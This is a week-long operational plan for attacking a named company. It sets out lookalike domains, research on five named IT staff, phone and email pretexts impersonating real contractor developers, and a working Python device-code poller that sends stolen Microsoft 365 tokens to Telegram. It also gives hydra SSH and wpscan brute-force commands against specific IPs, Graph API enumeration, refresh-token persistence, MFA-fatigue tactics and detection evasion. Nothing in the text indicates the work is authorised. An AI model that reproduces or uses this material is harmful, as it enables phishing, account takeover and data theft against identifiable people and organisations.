# WEEK 4: ATTACK EXECUTION PLAN
# Operation AD - wearesocial.com
# Date: 2026-01-27 to 2026-01-31 (Mon-Fri)

================================================================================
                              WEEK 4 OVERVIEW
================================================================================

Goal: Deploy phishing infrastructure and execute M365 device code attack
Primary Vector: M365 Device Code Phishing (70% success)
Parallel Vector: SSH Brute Force + WordPress spray
Targets: 5 IT personnel

================================================================================
             DAY 1 (MONDAY) - INFRASTRUCTURE + TARGET OSINT
================================================================================

## 1.1 DOMAIN PURCHASE & SETUP (Morning)

### Lookalike Domain Options (check availability):

## OPTION A: wearesocial lookalikes
wearesocial-it.com          ← IT support pretext
wearesocial-security.com    ← Security alert pretext
wearesocial-verify.com      ← Verification pretext
wearesocial-hr.com          ← HR/salary pretext
we-are-social.com           ← Typosquat
wearesoclal.com             ← Typosquat (l vs i)
wearesocial.co              ← TLD variation

## OPTION B: 93digital lookalikes (HIGH VALUE - known contractor)
93digital.com               ← Check if available (.co.uk is real)
93-digital.com              ← Hyphenated variant
93digital.io                ← TLD variation
93digital.net               ← TLD variation
93digitai.com               ← Typosquat (l vs i)
93digital-support.com       ← Support pretext
93digital-uk.com            ← Regional variant

WHY 93DIGITAL: They are the known IT contractor for wearesocial.
Developers vic@93digital.co.uk and matt@93digital.co.uk worked on
their WordPress plugin. IT staff will trust emails from 93digital.

### Domain Registrars (privacy-focused):
- Njalla (njal.la) - Anonymous registration
- Porkbun - Cheap + WHOIS privacy
- Namecheap - WHOIS privacy included

### After Purchase:
1. Enable WHOIS privacy
2. Set up DNS (Cloudflare recommended)
3. Configure SPF, DKIM, DMARC records
4. Wait 24-48 hours for DNS propagation

### DNS Records to Add:
TXT  @    "v=spf1 include:_spf.google.com ~all"
TXT  @    "v=DMARC1; p=none; rua=mailto:admin@yourdomain.com"
MX   @    10 mail.yourdomain.com

---

## 1.2 EMAIL SETUP (Morning)

### Email Provider Options:
- Microsoft 365 Business Basic ($6/user/month) - Best deliverability
- Google Workspace ($6/user/month) - Good deliverability
- Zoho Mail (Free for 5 users)
- ProtonMail ($4/month)
- Any provider that supports custom domains

### Setup Steps:
1. Purchase domain (Day 1 morning)
2. Sign up for email provider
3. Add domain to provider
4. Configure DNS records (provider gives you these)
5. Wait for verification (usually 15-60 min)
6. Create mailbox: security@yourdomain.com

### Recommended Mailboxes:

## For wearesocial lookalike:
- security@[domain] - IT security pretext
- hr@[domain] - HR/salary pretext
- support@[domain] - General IT support

## For 93digital lookalike:
- vic@[domain] - Impersonate Vitalijs Lobins (known dev)
- matt@[domain] - Impersonate Matt Knight (known dev)
- support@[domain] - General 93digital support
- projects@[domain] - Project handoff pretext

---

## 1.3 TARGET DEEP OSINT (Afternoon)

### Primary Targets (IT Personnel):

1. DAVID WHYBROW - IT Director
   Email: david.whybrow@wearesocial.com
   LinkedIn: [research]
   Phone: [research]
   Research Tasks:
   - LinkedIn profile (work history, skills, connections)
   - Social media (Twitter, Facebook, Instagram)
   - Conference talks, interviews
   - Personal interests for rapport building
   - Direct phone number (company directory leak?)

2. SIMONE SCREMIN - Technology Director
   Email: simone.scremin@wearesocial.com
   Research Tasks: [same as above]

3. TOBIAS HALL - Global Systems Manager
   Email: tobias.hall@wearesocial.com
   Research Tasks: [same as above]

4. NEIL LEE - Senior Systems Manager
   Email: neil.lee@wearesocial.com
   Research Tasks: [same as above]

5. JIMMY REILLY - Senior IT Support
   Email: jimmy.reilly@wearesocial.com
   Research Tasks: [same as above]

---

## 1.4 OSINT TOOLS FOR TARGET RESEARCH

### LinkedIn:
- LinkedIn Sales Navigator (free trial)
- Phantombuster (LinkedIn scraper)
- Manual search + save profiles

### Email Verification:
hunter.io verify
emailhippo.com
neverbounce.com

### Phone Number Discovery:
- LinkedIn (sometimes visible)
- Truecaller search
- Company directory leaks
- Google dorking: "david whybrow" "phone" OR "mobile"
- Data breach searches (HIBP, Dehashed)

### Social Media:
- Twitter: search @wearesocial mentions
- Facebook: search employees
- Instagram: search hashtags

---

## 1.5 PHONE NUMBER FOR VISHING

### VoIP Providers:
- Twilio ($1/month + $0.0085/min) - API for automation
- MySudo ($0.99/month) - Anonymous
- TextNow (Free with ads)
- Google Voice (Free, US only)
- Hushed ($25/year) - Burner numbers

### Number Selection:
Depends on target OSINT findings:
- If targets are UK-based: Get +44 number
- If targets travel frequently: Consider US +1 number
- Match caller ID to target's region for credibility

---

## DAY 1 CHECKLIST:
[ ] Domain purchased with WHOIS privacy
[ ] Email provider configured (M365/Google/etc)
[ ] DNS records added (SPF, DKIM, DMARC from provider)
[ ] Test email sent to personal inbox (check spam)
[ ] All 5 targets researched (LinkedIn, social)
[ ] Phone numbers found (at least 2-3 targets)
[ ] VoIP number purchased (based on target region)
[ ] VPN configured for all activities

================================================================================
                   DAY 2 (TUESDAY) - TOOL DEVELOPMENT
================================================================================

## 2.1 VISHING SCRIPTS (Finalize based on Day 1 OSINT)

### Script 1: IT Security Verification (to warm up target)
"Hi, this is [name] from IT Security at We Are Social. 
We're doing a security audit and need to verify your account.
You should receive an email shortly with a verification code.
Can you confirm you received it and let me know the code?"

### Script 2: Urgent Security Alert
"Hi [target name], this is IT Security. We detected unusual
login activity on your Microsoft account from [country].
To secure your account, please go to microsoft.com/devicelogin
and enter code [CODE]. This will verify your identity."

### Script 3: MFA Enrollment
"Hi, this is [name] from IT. We're rolling out mandatory MFA
next week. You should receive an email with setup instructions.
Please complete the verification today to avoid account lockout."

### Call Timing:
- Best: Wednesday-Thursday, 9-11 AM GMT
- Avoid: Monday morning (busy), Friday afternoon (checked out)
- Wait 2-5 min after sending email, then call

---

## 2.2 EMAIL TEMPLATES (Finalize)

### Template 1: IT Security Verification (wearesocial pretext)
Subject: [Action Required] Microsoft 365 Security Verification
From: IT Security <security@[wearesocial-domain].com>

### Template 2: SharePoint Access (wearesocial pretext)
Subject: [URGENT] SharePoint Access Suspended - Verify Now

### Template 3: Salary Document (high click rate)
Subject: Q1 2026 Compensation Review - Confidential
From: HR <hr@[wearesocial-domain].com>

See existing template: recon/week3/day3/phishing-template-it-verification.html

---

## 2.3 93DIGITAL IMPERSONATION SCENARIOS (HIGH SUCCESS)

### WHY THIS WORKS:
- 93digital is known IT contractor for wearesocial
- IT staff have worked with vic@93digital.co.uk and matt@93digital.co.uk
- Trusted third-party = lower suspicion
- Can reference real projects (terra WordPress plugin)

---

### SCENARIO 1: WordPress Security Update
From: vic@[93digital-lookalike].com
To: david.whybrow@wearesocial.com
Subject: Urgent: WordPress Security Patch Required - We Are Social Sites

Body:
Hi David,

We've identified a critical vulnerability in the WordPress installations
we manage for We Are Social. Microsoft has flagged this as requiring
immediate verification of admin accounts.

Can you please verify your Microsoft account so we can proceed with
the security patch deployment?

Go to: https://microsoft.com/devicelogin
Enter code: {{DEVICE_CODE}}

This needs to be done today to avoid potential data exposure.

Cheers,
Vic
93digital

---

### SCENARIO 2: Project Handoff / Access Request
From: matt@[93digital-lookalike].com
To: tobias.hall@wearesocial.com
Subject: Re: Project Terra - Access Verification Needed

Body:
Hi Tobias,

Following up on the terra plugin updates - Microsoft is requiring
all external contractors to re-verify account access.

Could you approve my access by completing this quick verification?

1. Go to https://microsoft.com/devicelogin
2. Enter code: {{DEVICE_CODE}}
3. Sign in with your We Are Social account

This will allow me to continue pushing updates to the repo.

Thanks,
Matt Knight
93digital

---

### SCENARIO 3: Shared Drive / Document Access
From: projects@[93digital-lookalike].com
To: jimmy.reilly@wearesocial.com
Subject: SharePoint Access - 93digital Contractor Portal

Body:
Hi Jimmy,

We're setting up a shared contractor portal for ongoing projects
and need IT to verify access permissions.

Microsoft requires admin verification before we can proceed:

1. Visit https://microsoft.com/devicelogin
2. Enter code: {{DEVICE_CODE}}
3. Approve the access request

Let me know if you have any questions.

Best regards,
93digital Projects Team

---

### 93DIGITAL SCENARIO ADVANTAGES:
- References real relationship (terra plugin, WordPress)
- Uses known developer names (Vic, Matt)
- External contractor = bypass internal security training
- IT staff expect to help contractors with access
- Lower suspicion than internal IT impersonation

---

## 2.4 TELEGRAM NOTIFICATION BOT

### Step 1: Create Telegram Bot
1. Message @BotFather on Telegram
2. Send /newbot
3. Name: "OperationAD_Alert" (or any name)
4. Save the API token: 123456789:ABCdefGHIjklMNOpqrSTUvwxYZ

### Step 2: Get Your Chat ID
1. Message your bot
2. Visit: https://api.telegram.org/bot<TOKEN>/getUpdates
3. Find "chat":{"id": YOUR_CHAT_ID}

### Step 3: Create Enhanced Token Poller with Telegram Alerts

---

## 2.5 ENHANCED TOKEN POLLER (token_poller_v2.py)

#!/usr/bin/env python3
"""
M365 Device Code Poller with Telegram Notifications
Operation AD - wearesocial.com
"""

import requests
import time
import json
import sys
from datetime import datetime

# ============== CONFIGURATION ==============
TELEGRAM_BOT_TOKEN = "YOUR_BOT_TOKEN_HERE"
TELEGRAM_CHAT_ID = "YOUR_CHAT_ID_HERE"

# Microsoft OAuth
TENANT_ID = "common"
CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
SCOPE = "https://graph.microsoft.com/.default offline_access"

DEVICE_CODE_URL = f"https://login.microsoftonline.com/{TENANT_ID}/oauth2/v2.0/devicecode"
TOKEN_URL = f"https://login.microsoftonline.com/{TENANT_ID}/oauth2/v2.0/token"

# ============== TELEGRAM FUNCTIONS ==============
def send_telegram(message):
    """Send notification to Telegram"""
    url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendMessage"
    data = {
        "chat_id": TELEGRAM_CHAT_ID,
        "text": message,
        "parse_mode": "HTML"
    }
    try:
        requests.post(url, data=data, timeout=10)
    except Exception as e:
        print(f"[!] Telegram error: {e}")

def send_telegram_document(filepath, caption):
    """Send file to Telegram"""
    url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendDocument"
    with open(filepath, 'rb') as f:
        files = {'document': f}
        data = {'chat_id': TELEGRAM_CHAT_ID, 'caption': caption}
        requests.post(url, files=files, data=data, timeout=30)

# ============== MAIN FUNCTIONS ==============
def get_device_code():
    """Request device code from Microsoft"""
    data = {"client_id": CLIENT_ID, "scope": SCOPE}
    response = requests.post(DEVICE_CODE_URL, data=data)
    
    if response.status_code == 200:
        return response.json()
    else:
        print(f"[!] Error: {response.text}")
        sys.exit(1)

def poll_for_token(device_code_response, target_email):
    """Poll for token and notify on success"""
    device_code = device_code_response["device_code"]
    interval = device_code_response.get("interval", 5)
    expires_in = device_code_response.get("expires_in", 900)
    
    start_time = time.time()
    
    # Notify polling started
    send_telegram(f"🎣 <b>POLLING STARTED</b>\n\n"
                  f"Target: {target_email}\n"
                  f"Code: <code>{device_code_response['user_code']}</code>\n"
                  f"Expires: {expires_in}s")
    
    while time.time() - start_time < expires_in:
        data = {
            "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
            "client_id": CLIENT_ID,
            "device_code": device_code
        }
        
        response = requests.post(TOKEN_URL, data=data)
        result = response.json()
        
        if "access_token" in result:
            # SUCCESS! Send alert
            send_telegram(f"🚨🚨🚨 <b>TOKEN CAPTURED!</b> 🚨🚨🚨\n\n"
                          f"Target: <b>{target_email}</b>\n"
                          f"Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n\n"
                          f"Access Token: <code>{result['access_token'][:50]}...</code>\n\n"
                          f"Refresh Token: {'✅ CAPTURED' if 'refresh_token' in result else '❌ NOT FOUND'}")
            return result
            
        elif result.get("error") == "authorization_pending":
            elapsed = int(time.time() - start_time)
            remaining = expires_in - elapsed
            print(f"[*] Waiting... ({remaining}s remaining)", end="\r")
            
        elif result.get("error") == "authorization_declined":
            send_telegram(f"❌ <b>USER DECLINED</b>\n\nTarget: {target_email}")
            return None
            
        elif result.get("error") == "expired_token":
            send_telegram(f"⏰ <b>CODE EXPIRED</b>\n\nTarget: {target_email}")
            return None
        
        time.sleep(interval)
    
    send_telegram(f"⏰ <b>TIMEOUT</b>\n\nTarget: {target_email}")
    return None

def save_tokens(tokens, target_email):
    """Save tokens and send to Telegram"""
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    filename = f"tokens_{target_email.replace('@','_at_')}_{timestamp}.json"
    
    with open(filename, 'w') as f:
        json.dump(tokens, f, indent=2)
    
    # Send file to Telegram
    send_telegram_document(filename, f"🔑 Tokens for {target_email}")
    
    return filename

def main():
    print("""
    ╔══════════════════════════════════════════════════════════════╗
    ║     M365 Device Code Poller v2 - Telegram Alerts             ║
    ║     Operation AD - wearesocial.com                           ║
    ╚══════════════════════════════════════════════════════════════╝
    """)
    
    if len(sys.argv) > 1:
        target_email = sys.argv[1]
    else:
        target_email = input("[?] Target email: ").strip()
    
    # Test Telegram connection
    send_telegram(f"🔧 <b>TOOL STARTED</b>\n\nTarget: {target_email}")
    
    # Get device code
    print("\n[*] Requesting device code...")
    device_code_response = get_device_code()
    
    user_code = device_code_response["user_code"]
    
    print("\n" + "="*60)
    print(f"[+] USER CODE: {user_code}")
    print(f"[+] URL: https://microsoft.com/devicelogin")
    print("="*60)
    print("\n[!] SEND PHISHING EMAIL NOW!")
    
    # Poll for token
    tokens = poll_for_token(device_code_response, target_email)
    
    if tokens:
        filename = save_tokens(tokens, target_email)
        print(f"\n[+] SUCCESS! Tokens saved to: {filename}")
        print(f"\n[*] Export for use:")
        print(f"export ACCESS_TOKEN='{tokens['access_token']}'")
        return 0
    else:
        print("\n[!] Failed to capture tokens")
        return 1

if __name__ == "__main__":
    sys.exit(main())

---

## 2.6 MULTI-TARGET LAUNCHER (launcher.py)

#!/usr/bin/env python3
"""
Launch multiple device code sessions for parallel targeting
"""

import subprocess
import sys
import time

TARGETS = [
    "david.whybrow@wearesocial.com",
    "simone.scremin@wearesocial.com",
    "tobias.hall@wearesocial.com",
    "neil.lee@wearesocial.com",
    "jimmy.reilly@wearesocial.com"
]

def main():
    processes = []
    
    for i, target in enumerate(TARGETS):
        print(f"[*] Starting poller for: {target}")
        
        # Start each in separate terminal (Linux)
        cmd = f"gnome-terminal -- python3 token_poller_v2.py {target}"
        # For tmux: cmd = f"tmux new-window -n '{target}' 'python3 token_poller_v2.py {target}'"
        
        subprocess.Popen(cmd, shell=True)
        time.sleep(2)  # Stagger starts
    
    print(f"\n[+] Started {len(TARGETS)} pollers")
    print("[*] Check each terminal for device codes")

if __name__ == "__main__":
    main()

---

## 2.7 EMAIL SENDING

### Manual Method (Recommended):
1. Log into your email provider webmail
2. Copy HTML template content
3. Replace {{DEVICE_CODE}} with actual code
4. Compose new email, paste HTML
5. Send to target

### Template Location:
recon/week3/day3/phishing-template-it-verification.html

### Email Subjects to Use:
- [Action Required] Microsoft 365 Security Verification
- [URGENT] SharePoint Access Suspended - Verify Now
- Q1 2026 Compensation Review - Confidential

### Tips:
- Send from webmail (looks more legitimate)
- Don't send to multiple targets in same email
- Wait 5-10 min between sends to avoid spam flags

---

## DAY 2 CHECKLIST:
[ ] Vishing scripts finalized (personalized from OSINT)
[ ] Email templates customized with domain
[ ] Telegram bot created and tested
[ ] token_poller_v2.py created with Telegram alerts
[ ] Multi-target launcher script ready
[ ] Email sender script configured
[ ] All scripts tested in dry-run mode
[ ] OPSEC review (VPN, proxies, etc.)

================================================================================
                  DAY 3 (WEDNESDAY) - WAVE 1 ATTACK
================================================================================

## 3.1 PRE-LAUNCH CHECKLIST

[ ] VPN active (Mullvad recommended)
[ ] Telegram alerts working
[ ] Email infrastructure tested
[ ] Phone ready for vishing follow-up
[ ] Target list finalized
[ ] Scripts tested

---

## 3.2 WAVE 1 ATTACK SEQUENCE

### Wave 1: 09:00 GMT (Primary Target)
Target: david.whybrow@wearesocial.com (IT Director)

1. [09:00] Generate device code
   python3 token_poller_v2.py david.whybrow@wearesocial.com
   
2. [09:01] Send phishing email
   python3 email_sender.py david.whybrow@wearesocial.com XXXXXXXX
   
3. [09:03] OPTIONAL: Vishing call
   "Hi David, this is James from IT Security..."
   
4. [09:00-09:15] Monitor Telegram for alerts

---

### Wave 2: 09:30 GMT (Secondary Targets)
Targets: simone.scremin, tobias.hall

1. Generate codes for both
2. Send emails within 1 minute of code generation
3. Optional vishing calls
4. Monitor for 15 minutes

---

### Wave 3: 10:00 GMT (Remaining Targets)
Targets: neil.lee, jimmy.reilly

Same process as Wave 2

---

## 3.3 PARALLEL ATTACKS

While waiting for phishing results, run:

### SSH Brute Force (51.178.16.62:2832)
hydra -L recon/week3/day3/mysql-users.txt \
      -P recon/week3/day3/mysql-passwords.txt \
      ssh://51.178.16.62:2832 -t 4 -vV

### WordPress Brute Force (18.191.203.70)
wpscan --url http://socialconstructdigital.com \
       --usernames admin,was_admin,sofia \
       --passwords recon/week3/day3/wp-custom-passwords.txt \
       --api-token c7s1vKrYbP07o0nxGcNVfw72O1JKdZzJgZLlKgG3mak

---

## 3.4 RESPONSE TO TELEGRAM ALERTS

### If "TOKEN CAPTURED" Alert:
1. IMMEDIATELY stop all other attacks
2. Verify token works:
   curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
     "https://graph.microsoft.com/v1.0/me" | jq .
3. Save refresh token securely
4. Begin post-exploitation (see m365-tactic-technique.txt)

### If "USER DECLINED" Alert:
1. Wait 30 minutes
2. Try different pretext (salary review, SharePoint access)
3. Consider vishing call

### If "CODE EXPIRED" Alert:
1. Generate new code
2. Send new email with different subject line
3. Call target to create urgency

---

## DAY 3 CHECKLIST:
[ ] Wave 1 launched (09:00)
[ ] Wave 2 launched (09:30)
[ ] Wave 3 launched (10:00)
[ ] Parallel attacks running (SSH, WordPress)
[ ] Telegram monitored continuously
[ ] All responses logged

================================================================================
                  DAY 4 (THURSDAY) - CONTINUE ATTACKS + VALIDATION
================================================================================

## 4.1 MORNING: FOLLOW-UP WAVES (if no success Day 3)

### Wave 4: 09:00 GMT - 93DIGITAL IMPERSONATION
- Switch to 93digital lookalike domain
- Use Scenario 1 or 2 (WordPress/Project handoff)
- Target same 5 people with contractor pretext
- More trusted = higher success rate

### Wave 5: 11:00 GMT - Target Expansion
- Add secondary targets (Technology Managers)
- cristian.schirru@wearesocial.com
- federico.rezzonico@wearesocial.com

---

## 4.2 TOKEN VALIDATION (if captured)

### Verify Access:
export ACCESS_TOKEN='eyJ...'

# Test token
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/me" | jq .

# Expected: User profile JSON
# If error: Token may have expired, use refresh token

---

## 4.3 IMMEDIATE POST-EXPLOITATION

### Priority 1: Azure AD Enumeration
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/users" | jq . > users.json

curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/groups" | jq . > groups.json

### Priority 2: SharePoint Credential Search
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/sites?search=*" | jq . > sites.json

### Priority 3: OneDrive (IT staff)
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://graph.microsoft.com/v1.0/me/drive/root/children" | jq . > onedrive.json

---

## 4.4 PERSISTENCE

### Save Refresh Token (CRITICAL)
echo "$REFRESH_TOKEN" > refresh_token_$(date +%Y%m%d).txt

### Generate New Access Token Anytime:
curl -s -X POST "https://login.microsoftonline.com/common/oauth2/v2.0/token" \
  -d "grant_type=refresh_token" \
  -d "client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  -d "refresh_token=$REFRESH_TOKEN" \
  -d "scope=https://graph.microsoft.com/.default" | jq .

---

## DAY 4 CHECKLIST:
[ ] Follow-up waves launched (if needed)
[ ] Captured tokens validated
[ ] Azure AD enumerated
[ ] SharePoint searched for credentials
[ ] Refresh token saved securely
[ ] Continue parallel attacks

================================================================================
                  DAY 5 (FRIDAY) - FINAL PUSH + DOCUMENTATION
================================================================================

## 5.1 MORNING: FINAL ATTACK WAVES (if still no success)

### Wave 6: Different Department
- Target HR/Finance personnel
- Use salary/benefits pretext

### MFA Fatigue Attack (Backup)
- If target clicked but didn't complete auth
- Spam Okta push notifications
- Call simultaneously to pressure approval

---

## 5.2 AFTERNOON: DOCUMENTATION

### If Success:
- Document all captured tokens
- Save Azure AD enumeration
- Screenshot SharePoint findings
- Secure refresh tokens

### If No Success:
- Document all attempts
- Analyze why attacks failed
- Plan Week 5 escalation

---

## DAY 5 CHECKLIST:
[ ] Final attack waves (if needed)
[ ] All findings documented
[ ] Refresh tokens secured
[ ] Week 4 summary report drafted
[ ] Week 5 plan outlined (if continuing)

================================================================================
                         WEEK 4 DELIVERABLES
================================================================================

1. [ ] Phishing infrastructure deployed
2. [ ] 5 IT targets phished
3. [ ] At least 1 M365 token captured (goal)
4. [ ] Azure AD user list extracted
5. [ ] SharePoint searched for credentials
6. [ ] Parallel attack results (SSH, WordPress)
7. [ ] Week 4 summary report

================================================================================
                           OPSEC REMINDERS
================================================================================

1. ALWAYS use VPN (Mullvad) for all activities
2. Rotate VPN servers between waves
3. Use residential proxy for email sending
4. Don't reuse device codes - generate fresh each time
5. Stagger attacks to avoid pattern detection
6. Monitor for target awareness (out-of-office replies, etc.)
7. Have kill switch ready if detected

================================================================================
                          SUCCESS CRITERIA
================================================================================

MINIMUM SUCCESS: 1 M365 token captured
GOOD SUCCESS: 2-3 M365 tokens + Azure AD enumeration
EXCELLENT: M365 access + SharePoint credentials found + pivot opportunity

================================================================================
